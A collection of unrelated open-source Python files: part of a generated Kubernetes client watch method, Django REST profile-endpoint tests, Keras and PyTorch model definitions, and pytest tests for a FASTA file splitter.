:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1WatchEvent
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
            return data
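The `continue`/`limit` contract described in the docstrings boils down to: request pages of at most `limit` items and keep echoing back the server's `continue` token until it comes back empty. A stdlib-only sketch of that loop against a fake paged endpoint (`fake_paged_list` and its integer token format are illustrative stand-ins, not part of this client):

```python
def fake_paged_list(items, limit, cont=0):
    """Stand-in for a paged list endpoint: returns one chunk plus the
    continue token for the next chunk ('' once the list is exhausted)."""
    nxt = cont + limit
    return items[cont:nxt], (nxt if nxt < len(items) else '')

def list_all(items, limit):
    """Collect every item by following continue tokens, page by page."""
    collected, cont = [], 0
    while True:
        chunk, cont = fake_paged_list(items, limit, cont)
        collected.extend(chunk)
        if cont == '':
            return collected

print(list_all(list(range(10)), 3))  # all ten items, gathered across four requests
```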
    def watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(self, **kwargs):  # noqa: E501
        """watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces  # noqa: E501

        watch individual changes to a list of Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(async=True)
        >>> result = thread.get()

        :param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1WatchEvent
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/watch/restics', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
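The `query_params` blocks above translate the client's snake_case keyword arguments into the camelCase query parameters the Kubernetes API expects. A minimal stdlib sketch of that renaming (the mapping dict below just restates the pairs visible in the code; `build_query_string` is an illustrative helper, not part of the generated client):

```python
from urllib.parse import urlencode

SNAKE_TO_CAMEL = {
    '_continue': 'continue',
    'field_selector': 'fieldSelector',
    'include_uninitialized': 'includeUninitialized',
    'label_selector': 'labelSelector',
    'resource_version': 'resourceVersion',
    'timeout_seconds': 'timeoutSeconds',
}

def build_query_string(**kwargs):
    # Names without a mapping (limit, pretty, watch) pass through unchanged.
    return urlencode([(SNAKE_TO_CAMEL.get(k, k), v) for k, v in kwargs.items()])

print(build_query_string(label_selector='app=stash', limit=5))
# -> labelSelector=app%3Dstash&limit=5
```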


# File: bookorbooks/account/tests/profile_tests.py
# (repo: talhakoylu/SummerInternshipBackend, license: MIT)
from country.models.country_model import Country
from country.models.city_model import City
import json
from rest_framework.test import APITestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from school.models import School

User = get_user_model()


class ChildProfileTests(APITestCase):
    url = reverse("account:child_profile_update")
    url_login = reverse("token_obtain_pair")

    def setUp(self):
        self.username = "johndoe"
        self.password = "pass1234"
        self.user_type = 2
        self.user = User.objects.create_user(username=self.username,
                                             password=self.password,
                                             user_type=self.user_type)
        self.login_data = {
            "username": self.username,
            "password": self.password
        }
        self.country = Country.objects.create(name="Türkiye", code="Tur")
        self.city = City.objects.create(country=self.country,
                                        name="Konya",
                                        code="42")
        self.profile_data = {
            "id": self.user.id,
            "first_name": "John",
            "last_name": "Doe",
            "email": "johndoe@example.com",
            "identity_number": "23456892138",
            "gender": 1,
            "birth_date": "1999-12-11",
            "user_child": {
                "city": self.city.id,
                "district": None,
                "hobbies": "example hobbies"
            }
        }

    def login_with_token(self):
        """
        Logs the test user in and attaches the JWT access token to the client;
        used by the tests below to avoid repeating the login flow.
        """
        response = self.client.post(self.url_login, self.login_data)
        self.assertEqual(200, response.status_code)
        token = response.data["access"]
        self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)

    def test_is_authenticated_user(self):
        """
        Tests that the user cannot access the profile update endpoint if they aren't authenticated.
        """
        response = self.client.get(self.url)
        self.assertEqual(401, response.status_code)

    def test_wrong_user_type(self):
        """
        Checks that users whose type is not child are rejected.
        """
        self.user.user_type = 4
        self.user.save()
        self.login_with_token()
        response = self.client.get(self.url)
        self.assertEqual(403, response.status_code)
        self.assertTrue("detail" in json.loads(response.content))

    def test_with_valid_informations(self):
        """
        Tests that the user can update user and profile fields with valid values.
        """
        self.login_with_token()
        response = self.client.put(self.url, self.profile_data, format='json')
        self.assertEqual(200, response.status_code)
        self.assertEqual(json.loads(response.content), self.profile_data)


class ParentProfileTests(APITestCase):
    url = reverse("account:parent_profile_update")
    url_login = reverse("token_obtain_pair")

    def setUp(self):
        self.username = "johndoe"
        self.password = "pass1234"
        self.user_type = 3
        self.user = User.objects.create_user(username=self.username,
                                             password=self.password,
                                             user_type=self.user_type)
        self.login_data = {
            "username": self.username,
            "password": self.password
        }
        self.country = Country.objects.create(name="Türkiye", code="Tur")
        self.city = City.objects.create(country=self.country,
                                        name="Konya",
                                        code="42")
        self.profile_data = {
            "id": self.user.id,
            "first_name": "John",
            "last_name": "Doe",
            "email": "johndoe@example.com",
            "identity_number": "23456892138",
            "gender": 1,
            "birth_date": "1999-12-11",
            "user_parent": {
                "city": self.city.id,
                "district": None,
                "profession": "example profession"
            }
        }

    def login_with_token(self):
        """
        Logs the test user in and attaches the JWT access token to the client;
        used by the tests below to avoid repeating the login flow.
        """
        response = self.client.post(self.url_login, self.login_data)
        self.assertEqual(200, response.status_code)
        token = response.data["access"]
        self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)

    def test_is_authenticated_user(self):
        """
        Tests that the user cannot access the profile update endpoint if they aren't authenticated.
        """
        response = self.client.get(self.url)
        self.assertEqual(401, response.status_code)

    def test_wrong_user_type(self):
        """
        Checks that users whose type is not parent are rejected.
        """
        self.user.user_type = 4
        self.user.save()
        self.login_with_token()
        response = self.client.get(self.url)
        self.assertEqual(403, response.status_code)
        self.assertTrue("detail" in json.loads(response.content))

    def test_with_valid_informations(self):
        """
        Tests that the user can update user and profile fields with valid values.
        """
        self.login_with_token()
        response = self.client.put(self.url, self.profile_data, format='json')
        self.assertEqual(200, response.status_code)
        self.assertEqual(json.loads(response.content), self.profile_data)
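The child and parent test classes differ only in `user_type` and the nested profile key, and the instructor class repeats the pattern a third time. A common refactor is a mixin that concrete test classes parameterize. A self-contained sketch of the idea (plain classes, no Django; all names below are illustrative, not part of this project):

```python
class ProfileCaseMixin:
    # Concrete cases override only what differs between user kinds.
    user_type = None
    profile_key = None       # e.g. "user_child" / "user_parent"
    extra_fields = {}

    def build_profile_data(self, city_id):
        return {
            "gender": 1,
            "birth_date": "1999-12-11",
            self.profile_key: {"city": city_id, **self.extra_fields},
        }

class ChildCase(ProfileCaseMixin):
    user_type = 2
    profile_key = "user_child"
    extra_fields = {"hobbies": "example hobbies"}

class ParentCase(ProfileCaseMixin):
    user_type = 3
    profile_key = "user_parent"
    extra_fields = {"profession": "example profession"}

print(ChildCase().build_profile_data(city_id=1)["user_child"])
# {'city': 1, 'hobbies': 'example hobbies'}
```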
class InstructorProfileTests(APITestCase):
    url = reverse("account:instructor_profile_update")
    url_login = reverse("token_obtain_pair")

    def setUp(self):
        self.username = "johndoe"
        self.password = "pass1234"
        self.user_type = 4
        self.user = User.objects.create_user(username=self.username,
                                             password=self.password,
                                             user_type=self.user_type)
        self.login_data = {
            "username": self.username,
            "password": self.password
        }
        self.country = Country.objects.create(name="Türkiye", code="Tur")
        self.city = City.objects.create(country=self.country,
                                        name="Konya",
                                        code="42")
        self.school = School.objects.create(city=self.city,
                                            name="Example School",
                                            address="Address",
                                            website="webisite.com")
        self.profile_data = {
            "id": self.user.id,
            "first_name": "John",
            "last_name": "Doe",
            "email": "johndoe@example.com",
            "identity_number": "23456892138",
            "gender": 1,
            "birth_date": "1999-12-11",
            "user_instructor": {
                "school": self.school.id,
                "branch": "example branch"
            }
        }

    def login_with_token(self):
        """
        Logs the test user in and attaches the JWT access token to the client;
        used by the tests below to avoid repeating the login flow.
        """
        response = self.client.post(self.url_login, self.login_data)
        self.assertEqual(200, response.status_code)
        token = response.data["access"]
        self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)

    def test_is_authenticated_user(self):
        """
        Tests that the user cannot access the profile update endpoint if they aren't authenticated.
        """
        response = self.client.get(self.url)
        self.assertEqual(401, response.status_code)

    def test_wrong_user_type(self):
        """
        Checks that users whose type is not instructor are rejected.
        """
        self.user.user_type = 2
        self.user.save()
        self.login_with_token()
        response = self.client.get(self.url)
        self.assertEqual(403, response.status_code)
        self.assertTrue("detail" in json.loads(response.content))

    def test_with_valid_informations(self):
        """
        Tests that the user can update user and profile fields with valid values.
        """
        self.login_with_token()
        response = self.client.put(self.url, self.profile_data, format='json')
        self.assertEqual(200, response.status_code)
        self.assertEqual(json.loads(response.content), self.profile_data)


# File: cbrain/models.py (repo: jens321/CBRAIN-CAM, license: MIT)
"""
Define all different types of models.

Created on 2019-01-28-13-17
Author: Stephan Rasp, raspstephan@gmail.com
"""

from .imports import *
from .cam_constants import *
from tensorflow.keras.layers import *
from .layers import *


def act_layer(act):
    """Helper function to return regular and advanced activation layers"""
    act = Activation(act) if act in tf.keras.activations.__dict__.keys() \
        else tf.keras.layers.__dict__[act]()
    return act


def fc_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
             inp_sub=None, inp_div=None, norm_q=None):
    inp = Input(shape=(input_shape,))
    # First hidden layer
    x = Dense(hidden_layers[0])(inp)
    x = act_layer(activation)(x)
    # Remaining hidden layers
    for h in hidden_layers[1:]:
        x = Dense(h)(x)
        x = act_layer(activation)(x)
    if conservation_layer:
        x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
        x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
        out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
    else:
        out = Dense(output_shape)(x)
    return tf.keras.models.Model(inp, out)
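`fc_model` stacks `Dense` layers of the given widths between input and output. As a quick framework-free sanity check, the trainable parameter count of such a stack (weights plus biases) can be computed directly; `mlp_param_count` below is an illustrative helper, not part of this module:

```python
def mlp_param_count(input_shape, hidden_layers, output_shape):
    """Parameters of a Dense stack: sum over layers of (n_in * n_out + n_out)."""
    sizes = [input_shape] + list(hidden_layers) + [output_shape]
    return sum(n_in * n_out + n_out for n_in, n_out in zip(sizes, sizes[1:]))

# e.g. a 64 -> 128 -> 128 -> 65 network, as fc_model(64, 65, [128, 128], ...)
# would build it:
print(mlp_param_count(64, [128, 128], 65))  # 33217
```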
def relu_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
               inp_sub=None, inp_div=None, norm_q=None):
    inp = Input(shape=(input_shape,))
    # First hidden layer
    x = Dense(hidden_layers[0])(inp)
    x = act_layer(activation)(x)
    # Remaining hidden layers
    for h in hidden_layers[1:]:
        x = Dense(h)(x)
        x = act_layer(activation)(x)
    if conservation_layer:
        x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
        x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
        out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
    else:
        out = Dense(output_shape)(x)
    # Clamp the outputs at zero with a final ReLU activation
    out = act_layer('relu')(out)
    return tf.keras.models.Model(inp, out)


def custom_activation(z):
    return z**10


def log_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
              inp_sub=None, inp_div=None, norm_q=None):
    inp = Input(shape=(input_shape,))
    # First hidden layer
    x = Dense(hidden_layers[0])(inp)
    x = act_layer(activation)(x)
    # Remaining hidden layers
    for h in hidden_layers[1:]:
        x = Dense(h)(x)
        x = act_layer(activation)(x)
    if conservation_layer:
        x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
        x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
        out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
    else:
        out = Dense(output_shape)(x)
    # Apply the custom activation to the outputs; act_layer only resolves
    # string names, so the callable is wrapped in an Activation layer directly.
    out = Activation(custom_activation)(out)
    return tf.keras.models.Model(inp, out)


# File: gan.py (repo: orhunguley/unsupervised_object_learning, license: MIT)
import argparse
import os

import numpy as np
import math

import torchvision.transforms as transforms
from torchvision.utils import save_image

from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable

import torch.nn as nn
import torch.nn.functional as F
import torch


class Discriminator(nn.Module):
    def __init__(self):
        super(Discriminator, self).__init__()

        def discriminator_block(in_filters, out_filters, bn=True):
            """Returns layers of each discriminator block"""
            block = [nn.Conv2d(in_filters, out_filters, 3, 2, 1),
                     nn.LeakyReLU(0.2, inplace=True),
                     nn.Dropout2d(0.25)]
            if bn:
                block.append(nn.BatchNorm2d(out_filters, 0.8))
            return block

        self.conv_blocks = nn.Sequential(
            *discriminator_block(3, 32, bn=False),
            *discriminator_block(32, 64),
            *discriminator_block(64, 128),
            *discriminator_block(128, 256),
        )

        # The height and width of downsampled image
        ds_size = 128 // 2 ** 4

        # Output layers
        self.adv_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, 1), nn.Sigmoid())
        # self.aux_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, opt.n_classes), nn.Softmax())

    def forward(self, img):
        out = self.conv_blocks(img)
        out = out.view(out.shape[0], -1)
        validity = self.adv_layer(out)
        # label = self.aux_layer(out)
        return validity
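Each `discriminator_block` uses a stride-2 `Conv2d` with kernel 3 and padding 1, so every block halves the spatial resolution; four blocks take a 128x128 input down to 8x8, which is exactly the `ds_size = 128 // 2 ** 4` used to size the linear head. A framework-free check of that arithmetic:

```python
def conv_out_size(n, kernel=3, stride=2, padding=1):
    """Standard conv output-size formula: floor((n + 2p - k) / s) + 1."""
    return (n + 2 * padding - kernel) // stride + 1

size = 128
for _ in range(4):          # the four discriminator blocks
    size = conv_out_size(size)
print(size, 128 // 2 ** 4)  # 8 8
```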
class MaskDiscriminator(nn.Module):
    def __init__(self):
        super(MaskDiscriminator, self).__init__()

        def discriminator_block(in_filters, out_filters, bn=True):
            """Returns layers of each discriminator block"""
            block = [nn.Conv2d(in_filters, out_filters, 3, 2, 1),
                     nn.LeakyReLU(0.2, inplace=True),
                     nn.Dropout2d(0.25)]
            if bn:
                block.append(nn.BatchNorm2d(out_filters, 0.8))
            return block

        self.conv_blocks = nn.Sequential(
            *discriminator_block(3, 32, bn=False),
            *discriminator_block(32, 64),
            *discriminator_block(64, 128),
            *discriminator_block(128, 256),
        )

        # The height and width of downsampled image
        ds_size = 128 // 2 ** 4

        # Output layers
        self.adv_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, 1), nn.Sigmoid())
        # self.aux_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, opt.n_classes), nn.Softmax())

    def forward(self, img):
        out = self.conv_blocks(img)
        out = out.view(out.shape[0], -1)
        validity = self.adv_layer(out)
        # label = self.aux_layer(out)
        return validity


# File: fastasplitter_splitter/tests/test_splitter.py
# (repo: alan-lira/fasta-splitter, license: MIT)
from pathlib import Path
from click.testing import CliRunner
import pytest
import fastasplitter_splitter.splitter
import fastasplitter_splitter.splitter_exceptions
import sys
import runpy


def test_when_number_of_arguments_equals_one_then_ok():
    number_of_arguments_provided = 1
    assert fastasplitter_splitter.splitter.check_if_is_valid_number_of_arguments(number_of_arguments_provided) is None


def test_when_number_of_arguments_not_equals_one_then_throws_invalid_number_of_arguments_exception():
    number_of_arguments_provided = 2
    with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidNumberofArgumentsError) as pytest_wrapped_e:
        fastasplitter_splitter.splitter.check_if_is_valid_number_of_arguments(number_of_arguments_provided)
    invalid_number_of_arguments_message = "Invalid number of arguments provided!\n" \
                                          "Expected: 1 argument (FASTA multiple sequences file).\n" \
                                          "Provided: {0} argument(s).".format(number_of_arguments_provided)
    assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidNumberofArgumentsError
    assert str(pytest_wrapped_e.value) == invalid_number_of_arguments_message


def test_when_multiple_sequences_file_not_exists_then_throws_file_not_found_exception():
    inexistent_multiple_sequences_file = Path("inexistent_multiple_sequences.fasta")
    with pytest.raises(FileNotFoundError) as pytest_wrapped_e:
        fastasplitter_splitter.splitter.check_if_multiple_sequences_file_exists(inexistent_multiple_sequences_file)
    file_not_found_message = "FASTA multiple sequences file not found!"
    assert pytest_wrapped_e.type == FileNotFoundError
    assert str(pytest_wrapped_e.value) == file_not_found_message


def test_when_multiple_sequences_file_exists_then_return_multiple_sequences_file_extension():
    multiple_sequences_file_extension_expected = ".fasta"
    temporary_multiple_sequences_file = Path("sequences.fasta")
    with open(temporary_multiple_sequences_file, mode="w"):
        pass
    multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
        .get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
    assert multiple_sequences_file_extension_returned == multiple_sequences_file_extension_expected
    temporary_multiple_sequences_file.unlink()


def test_when_multiple_sequences_file_does_not_have_fasta_extension_then_throws_invalid_extension_file_exception():
    temporary_multiple_sequences_file = Path("sequences.txt")
    with open(temporary_multiple_sequences_file, mode="w"):
        pass
    with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidExtensionFileError) as pytest_wrapped_e:
        fastasplitter_splitter.splitter \
            .check_if_multiple_sequences_file_has_fasta_extension(temporary_multiple_sequences_file)
    supported_fasta_file_extensions = fastasplitter_splitter.splitter.get_supported_fasta_file_extensions()
    invalid_extension_file_message = "Only FASTA extension files ({0}) are allowed!" \
        .format(", ".join(supported_fasta_file_extensions))
    assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidExtensionFileError
    assert str(pytest_wrapped_e.value) == invalid_extension_file_message
    temporary_multiple_sequences_file.unlink()


def test_when_description_line_is_parsed_then_return_description_lines_count():
    description_line_count_expected = 1
    line = ">ValidDescription1 |text1"
    individual_sequences_start_token = ">"
    description_lines_count_returned = 0
    description_lines_count_returned = fastasplitter_splitter.splitter \
        .parse_description_line(line, individual_sequences_start_token, description_lines_count_returned)
    assert description_lines_count_returned == description_line_count_expected


def test_when_description_line_contains_whitespace_right_after_start_token_then_return_true():
    line = "> InvalidDescription1"
    individual_sequences_start_token = ">"
    assert fastasplitter_splitter.splitter. \
        description_line_contains_whitespace_right_after_start_token(line, individual_sequences_start_token)


def test_when_description_line_contains_no_whitespace_right_after_start_token_then_return_false():
    line = ">ValidDescription1"
    individual_sequences_start_token = ">"
    assert not fastasplitter_splitter.splitter. \
        description_line_contains_whitespace_right_after_start_token(line, individual_sequences_start_token)


def test_when_description_line_has_no_information_after_start_token_then_return_true():
    line = ">"
    individual_sequences_start_token = ">"
    assert fastasplitter_splitter.splitter. \
        description_line_has_no_information_after_start_token(line, individual_sequences_start_token)


def test_when_description_line_has_information_after_start_token_then_return_false():
    line = ">AAA"
    individual_sequences_start_token = ">"
    assert not fastasplitter_splitter.splitter. \
        description_line_has_no_information_after_start_token(line, individual_sequences_start_token)


def test_when_invalid_description_line_is_parsed_then_return_invalid_description_lines_count():
    invalid_description_lines_count_expected = 1
    line = "> InvalidDescription1"
    individual_sequences_start_token = ">"
    invalid_description_lines_count_returned = 0
    invalid_description_lines_count_returned = \
        fastasplitter_splitter.splitter.parse_invalid_description_line(line,
                                                                       individual_sequences_start_token,
                                                                       invalid_description_lines_count_returned)
    assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
def test_when_multiple_sequences_file_is_parsed_then_return_sequences_file_counter():
description_lines_count_expected = 2
invalid_description_lines_count_expected = 1
lines_count_expected = 4
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write("> InvalidDescription1\nAAA\n")
multiple_sequences_file.write(">ValidDescription1 |text1\nCCC\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
assert description_lines_count_returned == description_lines_count_expected
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
assert lines_count_returned == lines_count_expected
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_has_no_description_line_then_throws_invalid_formatted_fasta_file_exception():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write("AAA\n")
multiple_sequences_file.write("CCC\n")
multiple_sequences_file.write("GGG\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter \
.check_if_multiple_sequences_file_has_any_description_line(temporary_multiple_sequences_file,
description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' does not have any description line!" \
.format(str(temporary_multiple_sequences_file))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_multiple_sequences_file.unlink()
def test_when_mult_sequences_file_has_invalid_description_lines_then_throws_invalid_formatted_fasta_file_exception():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write("> InvalidDescription1\nAAA\n")
multiple_sequences_file.write(">ValidDescription1 |text1\nCCC\n")
multiple_sequences_file.write(">ValidDescription2|text2\nGGG\n")
multiple_sequences_file.write("> InvalidDescription2|text2\nTTT\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter \
.check_if_multiple_sequences_file_has_any_invalid_description_line(temporary_multiple_sequences_file,
invalid_description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' contains {1} line(s) with invalid description format!" \
.format(str(temporary_multiple_sequences_file), str(2))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_has_no_data_then_throws_invalid_formatted_fasta_file_exception():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">ValidDescription1")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter.check_if_multiple_sequences_file_has_no_data(temporary_multiple_sequences_file,
lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' seems a empty fasta file!" \
.format(str(temporary_multiple_sequences_file))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_has_all_valid_lines_then_ok():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">ValidDescription1|text1\nAAA\n")
multiple_sequences_file.write(">ValidDescription2 |text2\nCCC\n")
multiple_sequences_file.write(">ValidDescription3\nGGG\n")
assert fastasplitter_splitter.splitter \
.check_if_is_valid_multiple_sequences_file(temporary_multiple_sequences_file) is None
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_path_is_on_the_same_level_then_return_empty_path_underscored_string():
multiple_sequences_file_same_level_path_parents_underscored_expected = ""
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
multiple_sequences_file_same_level_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_same_level_path_parents_underscored_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents_underscored(multiple_sequences_file_same_level_path_parents_returned)
assert multiple_sequences_file_same_level_path_parents_underscored_returned \
== multiple_sequences_file_same_level_path_parents_underscored_expected
temporary_multiple_sequences_file.unlink()
